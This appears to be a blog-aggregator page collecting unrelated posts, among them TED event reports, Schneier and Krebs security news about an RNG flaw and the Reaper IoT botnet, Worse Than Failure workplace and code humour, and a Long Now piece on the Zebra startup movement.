Allison Nobles is a PhD candidate in sociology at the University of Minnesota and a member of The Society Pages’ graduate editorial board. Her research primarily focuses on sexuality and gender, and their intersections with race, immigration, and law.

Jacqui Frost is a PhD candidate in sociology at the University of Minnesota and the managing editor at The Society Pages. Her research interests include non-religion and religion, culture, and civic engagement.

(View original at https://thesocietypages.org/socimages)

,

TEDFree report: Bright ideas in business, distilled from TEDGlobal 2017

What’s a good way to remember an idea in the middle of a conference — so you can turn it into action? Take notes and brainstorm with others. At TEDGlobal 2017 in Tanzania, the Brightline Initiative inspired people to brainstorm ideas around talks they’d just watched, including Pierre Thiam’s celebration of the ancient grain fonio (watch this talk). (Photo: Ryan Lash/TED)

Th Brightline Initiative helps executives implement ambitious ideas from business strategies, so it’s only fitting that the nonprofit group was onsite taking notes and holding brainstorms at TEDGlobal 2017 in Arusha, Tanzania. With the theme “Builders. Truth-Tellers. Catalysts.,” TEDGlobal was a celebration of doers and thinkers, including more than 70 speakers who’ve started companies, nonprofits, education initiatives and even movements.

We’re excited to share the Brightline Initiative’s just-released report on business ideas pulled from the talks of TEDGlobal 2017. These aren’t your typical business ideas — one speaker suggests a way to find brand-new markets by thinking beyond the physical address, while several others share how ancient traditions can spawn fresh ideas and even cutting-edge businesses. Whether you run a startup, sit in the C-suite or are known as a star employee, the ideas from these talks can spark new thinking and renew your inspiration.

Get the report here >>

PS: Look for more great ideas from the Brightline Initiative soon; this week at TED’s New York office, TED and Brightline partnered to produce an evening-length event of speakers who are creating change through smart, nuanced business thinking. Read about the event now, and watch for talks to appear on TED.com in the coming months.


CryptogramAttack on Old ANSI Random Number Generator

Almost 20 years ago, I wrote a paper that pointed to a potential flaw in the ANSI X9.17 RNG standard. Now, new research has found that the flaw exists in some implementations of the RNG standard.

Here's the research paper, the website -- complete with cute logo -- for the attack, and Matthew Green's excellent blog post on the research.

Worse Than FailureWith the Router, In the Conference Room

This is a follow-up to With the Router, In the Conference Room, revealing the… STUNNING CONCLUSION!

How It Really Ended

Darren took the case up to his boss, and then to their boss, up the management chain. No one was particularly happy with Cathy’s tone, and there was a great deal of tut-tutting and finger-wagging about professional conduct.

Ms. Scarlett, in Clue, delivering the line 'Flames, flames on the side of my face'

But she was right. It was Mr. Green who failed to follow instructions, it was Mr. Green who cost the company thousands, along with the customer relationship problems caused by Cathy’s sudden emergency trip back to the home office.

In what can only be considered a twist ending by the standards of this site, it was Mr. Green who was escorted out of the building by security.

The killer was Cathy, in the issue tracking system, with the snarky bug report.

[Advertisement] Universal Package Manager – store all your Maven, NuGet, Chocolatey, npm, Bower, TFS, TeamCity, Jenkins packages in one central location. Learn more today!

Worse Than FailureWith the Router, In the Conference Room

One of the most important aspects of software QA is establishing a good working relationship with developers. If you want to get them to take your bug reports seriously, you have to approach them with the right attitude. If your bugs imply that their work is shoddy, they are likely to fight back on anything you submit. If you continuously submit trivial “bugs”, they will probably be returned right away with a “not an issue” or “works as designed” status. If you treat any bug like it’s a critical showstopper, they will think you’re crying wolf and not immediately jump on issues that actually are critical.

Then there’s people like Mr. Green, a former coworker of submitter Darren A., that give QA a bad name. The Mr. Greens of the QA world are so incompetent that their stupidity can cause project delays, rack up thousands of dollars in support costs, and cause a crapstorm between managers. Mr. Green once ran afoul of Darren’s subordinate Cathy, lead developer on the project Mr. Green was testing.

A shot from the film Clue, where Mrs. White holds a gun in front of Col. Mustard

Cathy was en route to the United States from London for a customer visit when her phone exploded with voicemail notifications immediately upon disabling airplane mode. There were messages from Darren, Mr. Green, and anyone else remotely involved with the project. It seemed there was a crippling issue with the latest build that was preventing any further testing during an already tight timeline.

Instead of trying to determine the cause, Mr. Green just told everyone “Cathy must have checked something in without telling us.” The situation was dire enough that Cathy, lacking the ability to remotely debug anything, had to immediately return to London. Mr. Green submitted a critical bug report and waited for her to cross the Atlantic.

What happened next is perfectly preserved in the following actual bug report from this incident. Some developers are known for their rude and/or snarky responses to bug reports that offend them. What Cathy did here takes that above and beyond to a legendary level.

====
Raised:         14/May/2015
Time:           09:27
Priority:       Critical
Impact:         Severe
Raised By:      Mr. Green

Description
===========
No aspect of GODZILLA functions at present. All machines fail to connect with the server and we are unable to complete any further testing today.
All screens just give a funny message.
Loss of functionality severely impacts our testing timescales and we must now escalate to senior management to get a resolution.

15/May/2015 22:38
        User:   Cathy Scarlett
        Updated: Status
        New Value: Resolved - User Error
        Updated: Comment
        New Value:
                Thank you for this Mr. Green. I loved the fact that the entire SMT ordered me back to head office to fix
                this - 28 separate messages on my voicemail while I was waiting for my baggage.
                I was of course supposed to be fixing an issue our US customer has suffered for over a year but I
                appreciated having to turn around after I'd landed in New Jersey and jump back on the first return
                flight to Heathrow.

                Do you remember when you set up the Test room for GODZILLA Mr. Green?

                Do you remember hanging the WIFI router on a piece of string from the window handle because the
                cable wasn't long enough?

                Do you remember me telling you not to do this as it was likely to fall?

                Do you remember telling me that you sorted this out and got Networks to setup a proper WIFI router
                for all the test laptops?

                I remember this Mr. Green and I'm sure you'll remember when I show you the emails and messages.

                I walked into the test room at 10 o'clock tonight (not having slept properly for nearly
                3 days) to find the WIFI router on the floor with the network cable broken.
                        ROOT CAUSE: The string snapped

                There was a spare cable next to it so I plugged this one in instead.

                Then, because this was the correct cable, I put the WIFI unit into the mounting that was provided
                for you by networks.

                As if by magic, all the laptops started working and those 'funny messages' have now disappeared.
                GODZILLA can now carry on testing. I'm struggling to understand why I needed to fly thousands of
                miles to fix this given that you set this room up in the first place. I'm struggling to understand
                why you told the SMT that this was a software error. I'm struggling to understand why you bypassed my
                manager who would have told you all of this. I'm closing this as 'user error' because there
                isn't a category for 'F**king moron'

                72 hours of overtime to cover an aborted trip from London to New York and back:
                        £3,600

                1 emergency return flight:
                        £1,500

                1 wasted return flight
                        £300

                1 very nice unused hotel room that has no refund:
                        £400

                1 emergency taxi fare from Heathrow:
                        £200

                16 man days of testing lost
                        £6,000

                Passing my undisguised contempt for you onto SMT:
                        Priceless

Mr. Green was obviously offended by her response. He escalated it to his manager, who demanded that Cathy be fired. This left Darren in a precarious position as Cathy’s manager. Sure, it was unprofessional. But it was like getting a call from your child’s school saying they punched a bully in the nose and they want your child to be disciplined for defending themselves. Darren decided to push back at the QA manager and insist that Mr. Green is the one who should be fired.

This story might have ended with Mr. Green and Cathy forced into an uneasy truce as the company management decided that they were both too valuable to lose. But that isn’t how this story ended. Or, perhaps Darren's push-back back-fired, and he's the one who ends up getting fired. That also isn't how the story ended. We invite our readers to speculate, extrapolate and fabricate in the comments. Later this morning, we’ll reveal the true killer outcome…

And now, the conclusion to the story!

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet Linux AustraliaOpenSTEM: Election Activity Bundle

For any Australian Curriculum HASS topic from Prep to at least Year 6, we can safely say “We have a resource on that!” So when, like here in Queensland, an election is suddenly called and teachers want to do some related activities in class, we actually already have the materials for you as these topics […]

,

Planet Linux AustraliaRussell Coker: Logic of Zombies

Most zombie movies feature shuffling hordes which prefer to eat brains but also generally eat any human flesh available. Because in most movies (pretty much everything but the 28 Days Later series [1]) zombies move slowly they rely on flocking to be dangerous.

Generally the main way of killing zombies is severe head injury, so any time zombies succeed in their aim of eating brains they won’t get a new recruit for their horde. The TV series iZombie [2] has zombies that are mostly like normal humans as long as they get enough brains and are smart enough to plan to increase their horde. But most zombies don’t have much intelligence and show no signs of restraint so can’t plan to recruit new zombies. In 28 Days Later the zombies aren’t smart enough to avoid starving to death, in contrast to most zombie movies where the zombies aren’t smart enough to find food other than brains but seem to survive on magic.

For a human to become a member of a shuffling horde of zombies they need to be bitten but not killed. They then need to either decide to refrain from a method of suicide that precludes becoming a zombie (gunshot to the head or jumping off a building) or unable to go through with it. Most zombie movies (I think everything other than 28 Days Later) has the transition process taking some hours so there’s plenty of time for an infected person to kill themself or be killed by others. Then they need to avoid having other humans notice that they are infected and kill them before they turn into a zombie. This doesn’t seem likely to be a common occurrence. It doesn’t seem likely that shuffling zombies (as opposed to the zombies in 28 Days Later or iZombie) would be able to form a horde.

In the unlikely event that shuffling zombies managed to form a horde that police couldn’t deal with I expect that earth-moving machinery could deal with them quickly. The fact that people don’t improvise armoured vehicles capable of squashing zombies is almost as ridiculous as all the sci-fi movies that feature infantry.

It’s obvious that logic isn’t involved in the choice of shuffling zombies. It’s more of a choice of whether to have the jump-scare aspect of 18 Days Later, the human-drama aspect of zombies that pass for human in iZombie, or the terror of a slowly approaching horrible fate that you can’t escape in most zombie movies.

I wonder if any of the music streaming services have a horror-movie playlist that has screechy music to set your nerves on edge without the poor plot of a horror movie. Could listening to scary music in the dark become a thing?

Worse Than FailureCodeSOD: Drain the Swamp

You may remember Virginia N from An Extinction Event, where she struggles to refactor a legacy project with some… unusual design principles. ReSharper still continues to choke to death on their codebase, but her management has let her know, this won’t be a problem going forward.

“You see,” her boss explained, “we’re going to move the logic into stored procedures. That way, we can more easily re-use the logic between the Windows Forms client and the Web app.”

“Oh, there’s going to be a web app, now?” Virginia asked.

“Yes! They’re going to use best practices, like unit testing, so that they don’t end up with the same kind of mess we have,” her boss said.

Virginia was halfway to filing a request for a transfer when she heard more about the web project. Then she heard about their plan. They weren’t going to simply build a web-client for their backend, but instead were going to build an inner platform. The page logic would be a simple template, and all of the rules, styling, data and display logic would be stored as data in the database. “It’s gonna be really flexible!”

Virginia decided to stick with the fetid field she knew, instead of the “green field” which was going to be a fetid swamp in a matter of weeks.

In Virginia’s swamp, she has many, many 40,000 line classes. That much code means the code has no real cohesion, so it leads to Virginia finding variables named thus:

public bool IReallyDontWantToFetchTheDataOnLoadButDontWantToChangeTheOtherVariablesCauseWhoKnowsWhatWillHappen=false;

It’s at least descriptive. It also exists in the class side-by-side with variables like blnGetData, GetDataOnFormLoad, and GetDataOnFormrLoadS.

Elsewhere in the same file, they have a different problem. They added a control to the view, and needed an accessor method to decide whether it was visible or not. Actually, they needed a few, and they knew that the form would be changing over time, so they needed something that was “dynamic”.

Now, they could have simply added properties and getters/setters as the form changed and dealt with the follow on changes, but someone decided it was time to stress “Closed for Modification” was a good object-oriented practice. They left out the “Open for Extension” part of the open/closed principle, so they used this code instead, which uses a few index properties to decide which control should be modified.

private void SetVisiblePicNdt()
{
    string NomBtnNDT="";
    string NomBtnChant="";
    if (m_IndexChant>0)
    {
            NomBtnNDT="btn"+(m_IndexChant+1).ToString();
            NomBtnChant="btn"+(m_IndexChant).ToString();
    }
    else
    {
            NomBtnNDT="btn"+(m_IndexLB+1).ToString();

    }

    Control sectMain=null;

    for (int i=0;i<ctlRecherche.Controls.Count;i++)
    {
            if (ctlRecherche.Controls[i].Name=="sectMain")
            {
                    sectMain=ctlRecherche.Controls[i];
                    break;
            }

    }
    if (sectMain!=null)
    {
            for (int i=0;i<sectMain.Controls.Count;i++)
            {
                    if (sectMain.Controls[i].Name=="panFilterSection")
                    {
                            panFilterSection=sectMain.Controls[i];
                            break;
                    }

            }
    }
    if (panFilterSection!=null)
    {
            for (int i=0;i<panFilterSection.Controls.Count;i++)
            {
                    if (panFilterSection.Controls[i].Name==NomBtnNDT)
                    {
                            panFilterSection.Controls[i].Visible=false;
                            break;
                    }

            }
    }

}

Virginia has many more horrors to share, so expect more examples from this code base.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

,

CryptogramFriday Squid Blogging: Steel Mesh Giant Squid Used as Artificial Reef

Researchers in the British Virgin Islands have sunk a giant squid made out of steel mesh to serve as an artificial reef.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Krebs on SecurityFear the Reaper, or Reaper Madness?

Last week we looked at reports from China and Israel about a new “Internet of Things” malware strain called “Reaper” that researchers said infected more than a million organizations by targeting newfound security weaknesses in countless Internet routers, security cameras and digital video recorders (DVRs). Now some botnet experts are calling on people to stop the “Reaper Madness,” saying the actual number of IoT devices infected with Reaper right now is much smaller.

Arbor Networks said it believes the size of the Reaper botnet currently fluctuates between 10,000 and 20,000 bots total. Arbor notes that this can change any time.

Reaper was based in part on “Mirai,” IoT malware code designed to knock Web sites offline in high-powered data floods, and an IoT malware strain that powered most of the largest cyberattacks of the past year. So it’s worrisome to think someone may have just built an army of a million IoT drones that could be used in crippling, coordinated assaults capable of wiping most networks offline.

If criminals haven’t yet built a million-strong botnet using the current pool of vulnerable devices, they certainly have the capacity to do so.

“An additional 2 million hosts have been identified by the botnet scanners as potential Reaper nodes, but have not been subsumed into the botnet,” Arbor’s ASERT team wrote, explaining that the coders may have intentionally slowed the how quickly the malware can spread to keep it quiet and under the radar.

Arbor says Reaper is likely being built to serve as the machine powering a giant attack-for-hire service known as a “booter” or “stresser” service.

“Our current assessment of Reaper is that it is likely intended for use as a booter/stresser service primarily serving the intra-China DDoS-for-hire market,” Arbor wrote. “Reaper appears to be a product of the Chinese criminal underground; some of the general Reaper code is based on the Mirai IoT malware, but it is not an outright Mirai clone.”

On Thursday I asked Israeli cybersecurity firm Check Point — the source of the one-million Reaper clones claim — about how they came up with the number of a million infected organizations.

Check Point said it knows of over 30,000 infected devices that scanned for additional vulnerable devices.

“We had a prism into these attacks from a data set that only contains a few hundreds of networks, out of which 60% were being scanned,” said Maya Horowitz, a group manager in the threat intelligence division of Check Point. “Thus we assume that the numbers globally are much higher, in at least 1 order of magnitude.”

Reaper borrows programming code from Mirai. But unlike Mirai, which infects systems after trying dozens of factory-default username and password combinations, Reaper targets nine security holes across a range of consumer and commercial products. About half of those vulnerabilities were discovered only in the past few months, and so a great many devices likely remain unpatched against Reaper.

Chinese cybersecurity firm Netlab 360, which published its own alert on Reaper shortly after Check Point’s advisory, issued a revised post on Oct. 25 stating that the largest gathering of Reaper systems it has seen by a single malware server is 28,000. Netlab’s original blog post has links to patches for the nine security flaws exploited by Reaper.

CryptogramFBI Increases Its Anti-Encryption Rhetoric

Earlier this month, Deputy Attorney General Rod Rosenstein gave a speech warning that a world with encryption is a world without law -- or something like that. The EFF's Kurt Opsahl takes it apart pretty thoroughly.

Last week, FBI Director Christopher Wray said much the same thing.

This is an idea that will not die.

Rondam RamblingsThe utter absurdity of the pro-life position

I can think of no better example of erudition without substance than George Will's recent column in the Washington Post entitled, "Democrats are the real abortion extremists."  On the surface his argument seems eminently reasonable: the legal regimen regarding abortion in the U.S. is too mathematically neat and tidy to have any basis in either law or scientific fact, and so clinging to this

Worse Than FailureError'd: Trick or Treat? Smell My Feet

"Sorry, but 4.2 billion Microsoft points sounds like 'all tricks' to me," writes Ergin S.

 

"Most paints are air-drying, but with this one, you apparently need to, um, assist with the air flow a bit," wrote Peter G. (Side Note: For fun, go ahead and google the item title.)

 

Dave P. writes, "Um, The US Supreme Court is patching Android within to decide Microsoft email privacy dispute!? Thanks Slashdot!"

 

"Why yes, it's the first time that I've seen this network at the workplace," wrote Wouter.

 

Adam L. writes, "And here I thought you only got to celebrate a trip around the sun only once per year. Neat!"

 

"You guys! My iPhone is DAMAGED! Thankfully there's an app on the Google Play store that can fix it!" I found this one.

 

[Advertisement] Application Release Automation for DevOps – integrating with best of breed development tools. Free for teams with up to 5 users. Download and learn more today!

Planet Linux AustraliaOpenSTEM: Happy Teachers’ Day

OpenSTEM would like to extend warm congratulations to all teachers on Teachers’ Day!! We salute you all for the wonderful job you do for all students every day, often without thanks or praise. It is not lightly that people say “If you can read this, thank a teacher”. Teachers truly are the force that shapes […]

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 4

This week our youngest students are looking at Aboriginal Places, while slightly older students are comparing Australia to other places around the world. Our older students are starting their class election segment of work, covering several parts of the Civics and Citizenship, as well as the History, curricula. Foundation/Kindy/Prep to Year 3 Students in Foundation/Kindy/Prep […]

,

TEDThe making of TED-Ed’s first 360° animation

 

Virtual reality is an emerging medium for artists and educators. Painting is an ancient art form; some cave paintings were made up to 40,000 years ago. In TED-Ed’s first 360° animated video, you can examine the intersection of these two ideas by exploring an ancient cave and its surroundings as educator Iseult Gillespie shares a brief history of cave paintings. Below, animation director Michael “Lippy” Lipman shares a few tips, sketches and stories from the making of this special animation.

As director of the very first TED-Ed VR animated short, you worked with an ace team to bring hand-drawn animation and educational content to life in a new genre: the emerging medium of 360° 2D stereoscopic VR animation. How difficult was it to pull that rabbit out of the hat?

Generally I can say that pulling together all of the various technologies and production artists to make this happen was probably THE most daunting production challenge I’ve ever encountered in my 25 years of working in animation. There is simply no “one product solution” at this point in VR’s production adolescence.

Happily, we were pretty ruthless and focused in our desire to create a VR cartoon. I’m glad we persevered.

To get from the original concept idea to a working final product required cobbling together a “tech salad” of software solutions. And to make it even more challenging, the final presentation platform — Google Cardboard video presented on YouTube — kept iterating throughout our production process. So that in itself was a moving target which made our ability to cross the finish line more precarious by the month! Happily, we were pretty ruthless and focused in our desire to create a VR cartoon. I’m glad we persevered.

When did you start working on this particular animation project with TED-Ed?

I received my first Cardboard player in my New York Times Sunday delivery in the fall of 2015. I’d been reading about the platform, but when the viewer just showed up in my living room I immediately realized that millions of NYT readers now had access to Cardboard-based content. I made a decision that morning to create cartoons for the platform!

I thought long and hard about what kinds of content would work well in the 360° VR world and pretty quickly came to the idea that a narrator-driven vehicle could work very well in a medium where the viewer can be looking at any point in the 360° sphere at any time. This is a massive challenge for traditional narrative cinema because the director is not fully in charge of choosing the audience’s focus. And though I certainly had to deal with many of the same challenges as an animation director, I knew that the inclusion of a voiceover narrator would make my job easier by directing the viewer to look for specific visuals within the world I would create.

Panoramic image of inside the cave.

Early concept art included this flat, panoramic painting of the inside of the cave. Art credit: Lippy/TED-Ed

Why did you suggest the topic of prehistoric cave paintings for this video?

Well, once I’d gotten the Cardboard viewer I began to gorge myself on any and all of the 360° VR content I could find. I knew that I wanted to make the piece as a hand-drawn 2D animated short. Having set that criteria, it then dawned on me that I’d be required to design, paint, and perhaps animate an entire world in not only 360 degrees horizontally, but vertically too. This type of world creation is a sort of “given” in 3D animation production. But working in 2D would require a different approach, and a new way of visualizing the experience that I hadn’t thought of before. I panicked. I wondered what I’d gotten myself into. Eventually I calmed down and realized that working inside a confined space would fit the project well and allow me to create visual “fences” beyond which the viewer wouldn’t be interested in looking. Initially I thought the subject of the piece could center around a part/system of the human body where the viewer would be inside the blurry, rose-colored walls of some organs or something. Then I hit upon the idea of a cave and it was a fairly quick leap from just any cave to a specific cave which housed prehistoric paintings. I was energized, and proposed this cave painting idea to TED-Ed, who also agreed that it was a good source of educational and visual promise.

Storyboards for the ‘Mid-Cave’ Shaman sequence.

Storyboards for the ‘Mid-Cave’ Shaman sequence. Art credit: Lippy/TED-Ed

What kind of creative challenges did you face in designing for a 360-degree visual storytelling environment?

There were a lot of technical challenges in learning about how exactly to create artwork on a flat computer monitor and have it look “right” within the 360° sphere of the cave. This took weeks and months of trial and error to come up with a system that was rock solid. By now, the technical targets will likely have iterated again and our “bullet-proof” process will need to be upgraded.

Technical issues aside, perhaps the biggest challenge was in how to present the educational highlights of the text without requiring the viewer to be looking at a certain place at a certain time. This was a huge conceptual mountain to climb. I decided that the best teaching method for this particular short would be to create a few large set pieces (inside a cave, outside overlooking a prehistoric meadow) and let the voiceover just run atop it all while the action played out beneath. Generally the “business” of the characters and situations happen in their own pacing and feel integrated with what the narrator is saying, but they are not slavishly tied to every educational point being made. I wanted to bolster the viewer’s freedom to look anywhere at any time.

Preliminary sketches for the ‘Shaman’ character.

Preliminary sketches for the ‘Shaman’ character. Art credit: Lippy/TED-Ed

Are there any sights, sounds, or hand-drawn scenes in this lesson that you specifically want to highlight for the TED community?

I spent a lot of time and animation effort into getting the masked Shaman to walk correctly and hop with weight and determination. I cracked open some of my favorite animation ‘how to’ books and refreshed my knowledge of the basics of character animation. I designed the Shaman’s entire entrance and trance sequence by using tiny thumbnails, then turning those thumbnails into stick figures, and finally fleshing out those stick figures into finished poses. I worked with a digital tablet and pen when doing all of the final line work for the Shaman and the entire piece. I started the process with pencils (for storyboards and thumbnail designs) but jumped to digital pen as soon as I could, to reduce having to duplicate efforts across multiple media.

As far as spatial depth goes, I’ll direct your readers to notice the layers of stereoptic layering that my production partners at Idle Hands Studios created. This tech didn’t exist “right out of the box” with any current software package. The geniuses at IH wrote some discrete code for this TED-Ed project so that when the viewer turns in any direction the layers of depth remain consistent. That sounds like it should be a straightforward feature available in any 360° VR production package. But it’s actually a huge hole in the system right now and requires individual solutions for each situation.

Is there anything else you’d like to share with readers about the experience of directing this experiment?

Only that the producers at TED-Ed have been amazingly supportive and patient with this production. They realized from the beginning that I was attempting to do something new and that really hadn’t been done before (2D hand-drawn animation in 360° VR). They were as excited as I was and they never wavered in their support even though I traversed some very stressful chasms in trying to find a production solution which would take us to a successful end.

Would you want to do more of these video productions?

We’re already talking about the next one!

Want to view this TED-Ed animated 360° video?

If you have access to a Google Cardboard viewer and a smart phone:

  1. Open this video in the YouTube app on your phone.
  2. Hit pause on the video.
  3. Tap the 3 vertical dots on the top right corner of the view window. This will slide up a sub-menu where you will choose the quality setting of your video stream. Choose “2160s.” Note that if you are not streaming over Wifi, YouTube will only allow “720s” quality.
  4. Tap on the “Cardboard viewer” icon on the bottom row of the video window (it looks like a mask). This will present the video full screen in prep for the Cardboard viewer.
  5. The screen is now divided into 2 halves, separated by a thin white line that runs halfway up the screen. Make sure to rotate your phone so that this thin line is coming from the bottom of the screen. This ensures proper stereoscopic depth.
  6. Insert your phone into the Cardboard viewer and press play. The video will begin. Enjoy!

If you do not have access to a Cardboard or smart phone:

  1. You can watch on your browser. Use your mouse to drag and explore the space above, below, and behind you. Enjoy!

This article was adapted for the TED Blog from this TED-Ed blog post


LongNowCan “Zebras” Fix What “Unicorns” Break?

Long Now Partners with Zebra Movement to Help Bring Long-Term Thinking to Startups and Venture Capital

The disruptive potential of Silicon Valley, epitomized in the mantra to “move fast and break things”, was once praised as its killer feature. These days, it is increasingly perceived as a bug.  Startups come and go, but the underlying structure of tech and venture capital persists. Entrepreneurs and investors have grown accustomed to the idea of limited runway, quick exits, and short-term gains, while accepting a 90% failure rate among startups as simply the cost of admission for playing the game. “Growth becomes the overriding motivation,” Noam Cohen wrote in a recent piece for The New York Times. “Something treasured for its own sake, not for anything it brings to the world.”

Entrepreneurs Jennifer Brandel, Mara Zepeda, Astrid Scholz, and Aniyia Williams are after a different sort of disruption—one that transforms tech and venture capital through long-term thinking and alternative business models that result in both profit and social impact. They call their project the Zebra Movement.

Founders of the Zebra Movement. From left: Jennifer Brandel, Co-Founder and CEO of Hearken; Mara Zepeda, Co-Founder and CEO of Switchboard; Astrid Scholz, Co-Founder and CEO of Sphaera; and Aniyia Williams, Co-Founder and CEO of Tinsel / Black & Brown Founders.

It started in 02016, when the Zebra founders wrote a provocative essay that deployed sex metaphors to critique the startup status quo of chasing “unicorns”:

Much is made about Silicon Valley’s culture of “innovation.” But the model for startup venture financing, and the system of rewards driving this supposed innovation, isn’t creative — it’s masturbatory. It wastes potential. It’s uninspired. It leaves founders like us staring at the ceiling.

Yes, we want to build businesses that succeed financially. But we also want so much more than that, and we aren’t alone. Most of the founders we know, many of whom happen to be women, are driven to build companies that generate money and meaning. And they’re in it for the long haul — not just to get their jollies, make their names, and exit.

The essay went viral, generating responses from hundreds of founders, investors, and advocates. The Zebra founders followed with a manifesto earlier this year to provide the beginnings of a solution to what they called the “broken” structure of technology and venture capital.

This is an urgent problem. For in this game, far more than money is at stake. When VC firms prize time on site over truth, a lucky few may profit, but civil society suffers. When shareholder return trumps collective well-being, democracy itself is threatened. The reality is that business models breed behavior, and at scale, that behavior can lead to far-reaching, sometimes destructive outcomes.

[…]

A company’s business model is the first domino in a long chain of consequences. In short: “The business model is the message.” From that business model flows company culture and beliefs, strategies for success, end-user experiences, and, ultimately, the very shape of society.

We believe that developing alternative business models to the startup status quo has become a central moral challenge of our time. These alternative models will balance profit and purpose, champion democracy, and put a premium on sharing power and resources. Companies that create a more just and responsible society will hear, help, and heal the customers and communities they serve.

The founders enlisted the Zebra as the symbol for their movement:

Why zebras?

  • To state the obvious: unlike unicorns, zebras are real.
  • Zebra companies are both black and white: they are profitable and improve society. They won’t sacrifice one for the other.
  • Zebras are also mutualistic: by banding together in groups, they protect and preserve one another. Their individual input results in stronger collective output
  • Zebra companies are built with peerless stamina and capital efficiency, as long as conditions allow them to survive.

Thousands responded after the Zebra founders proposed a conference to gather together and further define the goals and ethos of their movement. DazzleCon (a “dazzle” being a gathering of zebras) will be taking place from Wednesday, November 15 to Friday, November 17, 02017 in Portland, Oregon. Long Now has joined the Rockefeller Foundation, the MacArthur Foundation, and the Knight Foundation, among others, in supporting the Zebra founders by sharing resources, ideas and strategy for considering and applying long-term thinking to the growing conversation within the movement. We will be co-partnering with DazzleCon for the evening program of keynote talks on Wednesday, November 18th. (The evening program is open to the public; Long Now members can receive a $15 discount by entering the promo code LONGNOWDAZZLE on the Eventbrite page). 

We asked one of the founders, Mara Zepeda, to reflect on the role she believes long-term thinking should play in technology and Silicon Valley:

I grew up with many tattered copies of the Whole Earth Catalog. I would later connect with Howard Rheingold, who sits at the intersection of the Whole Earth Catalog ethos and technology, as a friend and teacher (we also both graduated from Reed College). I believe the deep, nuanced, systems thinking approach the Long Now Foundation promotes is so necessary in today’s culture. As the co-founder and CEO of a technology company, I’ve noticed its absence most acutely in technology, where a pervasive “winner takes all” culture of investor profits, billion dollar companies, and quick exits reigns supreme. Long-term thinking is what is so desperately needed in these times.

We need to return to the values of thinkers like Stewart Brand, Alan Kay, Howard Rheingold, Christopher Alexander, and Douglas Engelbart who believed that technology should augment humans, and create thriving ecosystems of collective intelligence.

In The Clock of the Long Now, Stewart Brand quotes institutional management advisor Rosabeth Moss Kanter. The gist is that people who take the long view will do so when they trust their leaders, the rules of the game are fair, they will share equitably in the returns, and feel a commitment to those who come after them. Zebra companies embody and promote these values of trust, shared prosperity, and a long-term investment in the earth, community, and each other.

Aligning around these principles creates better people, more ethical products, cooperative communities, and a kinder and more equitable world. We are thrilled to partner and share this wealth of knowledge across disciplines and generations.

If you’re interested in attending DazzleCon, or would like to know more about the Zebra Movement, head here. To attend the evening program at a discounted rate, enter LONGNOWDAZZLE on the Eventbrite page.

Sociological ImagesCollege pays…if you’re white

The staff at How Much recently visualized summaries from a Federal Reserve analysis showing how much a college degree can matter for your net worth. It turns out education can really pay…if you’re white.

This illustrates an important sociological point. When we talk about structural inequality, critics often note that we shouldn’t disregard individuals’ efforts to work and earn a better life. Getting a college degree is one of the centerpieces of this argument. These gaps show it’s not that effort doesn’t matter at all, but that inequality in social conditions means those efforts yield wildly different outcomes.

Want to read more on higher education and America’s wealth gap? Check out Tressie McMillan Cottom’s Lower Ed, Thomas Shapiro’s Toxic Inequality, and Dalton Conley’s Being Black, Living in the Red.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

TED8 ways TEDxers gave back on TEDxGlobalDay

The spirit of the TEDx community shone brightly during the first TEDxGlobalDay in September. In this dynamic one-day initiative, more than 5,000 TEDxers from 230 cities in 76 countries set out to prove that local action can spark global conversations.

The day was broken up into three parts, organized by local hosts who managed teams of around 20 people each. Each team watched the talks from TEDGlobal>NYC, talked about ways to foster change in their communities, and then went out into the field to volunteer: Teams cleaned up public spaces, helped with hurricane relief, visited local schools and orphanages to deliver necessary supplies and visit with the children, and helped spread awareness about mental health issues.

Take a look at what some of the teams did — and check out the TEDxGlobalDay Facebook page for more examples.

People stand over a large pot of stew, as a woman serves a plate of food with help from a colleague.

Beirut, Lebanon

The team from TEDxLAU joined up with FoodBlessed, a volunteer organization that fights food poverty in Lebanon. Together, they helped to serve a weekly meal for those in need.

A group of volunteers stand together holding full trash bags and smiling.

Lagos, Nigeria

In Nigeria, TEDx teams talked with a local recycling company about the importance of proper waste disposal. They then went out to tidy up the streets of Lagos and interact with locals to share what they learned.

A woman leans down to till earth and compost.

Jakarta, Indonesia

TEDxJakarta went to an urban garden to learn more about the benefits of composting. They learned about how using their leftover food as fertilizer helps reduce waste, and got their hands dirty as they practiced how to grow their own food with it.

A young woman stands amid laid out blankets in a room, as a man lays another out.

Santa Clara, California

The team from TEDxLosGatosHighSchool made blankets and pet beds, then delivered them to a local animal shelter.

Two men pat at the earth around a newly planted sapling

Bangalore, India

TEDxers kicked things off with a welcoming dance, followed by rose milk and samosas. After the talks, the team went to visit an orphanage for differently abled kids, where they put on a song-and-dance performance and helped plant tree saplings on the grounds.

A group of people stand together holding full trash bags.

Chiang Mai, Thailand

The TEDxChiangMai team went out into the streets for a two-part activity. They took a walk around the center of town to clean up the streets, and also kicked off a “no straw” campaign that encourages people to switch from disposable plastic straws to those made from stainless steel, bamboo or papaya fibers.

An energetic group of people. A woman in the middle throws a paper plane that is mid-flight.

Tehran, Iran

The TEDxTehran team spent the day discussing Iran’s economy, specifically how to find solutions to the current recession. They broke up into small groups, and each created a mini model of Iran’s economy to test their ideas. In this activity, each group built their own “paper airplane factory” and received an order for 18 paper airplanes. Their goal: produce beautiful high-quality paper airplanes based on some of the solutions they had brainstormed.

Shamāl Kurdufān, Sudan

The TEDXALUbayyid team spent the day working with orphaned children. At a local school for orphans, they helped to build new classrooms and spent time picking up garbage around the grounds, to create a clean, happy space for the kids.


Planet Linux AustraliaRussell Coker: Anarchy in the Office

Some of the best examples I’ve seen of anarchy working have been in corporate environments. This doesn’t mean that they were perfect or even as good as a theoretical system in which a competent manager controlled everything, but they often worked reasonably well.

In a well functioning team members will encourage others to do their share of the work in the absence of management. So when the manager disappears (doesn’t visit the team more than once a week and doesn’t ask for any meaningful feedback on how things are going) things can still work out. When someone who is capable of doing work isn’t working then other people will suggest that they do their share. If resources for work (such as a sufficiently configured PC for IT work) aren’t available then they can be found (abandoned PCs get stripped and the parts used to upgrade the PCs that need it most).

